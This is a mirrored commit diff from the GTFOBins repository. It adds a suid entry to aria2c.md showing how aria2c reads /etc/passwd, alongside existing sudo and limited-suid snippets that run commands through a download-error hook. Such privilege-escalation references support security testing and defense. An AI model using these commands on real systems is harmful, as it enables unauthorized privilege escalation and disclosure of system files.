mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-23 20:03:16 +01:00
Update aria2c.md
This commit is contained in:
parent
b724cd9bc1
commit
ef87c22c36
@ -23,6 +23,11 @@ functions:
|
|||||||
echo "$COMMAND" > $TF
|
echo "$COMMAND" > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
sudo aria2c --on-download-error=$TF http://x
|
sudo aria2c --on-download-error=$TF http://x
|
||||||
|
suid:
|
||||||
|
- description: It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
|
||||||
|
- code: |
|
||||||
|
LFILE='/etc/passwd'
|
||||||
|
aria2c -i $LFILE
|
||||||
limited-suid:
|
limited-suid:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
|
Loading…
Reference in New Issue
Block a user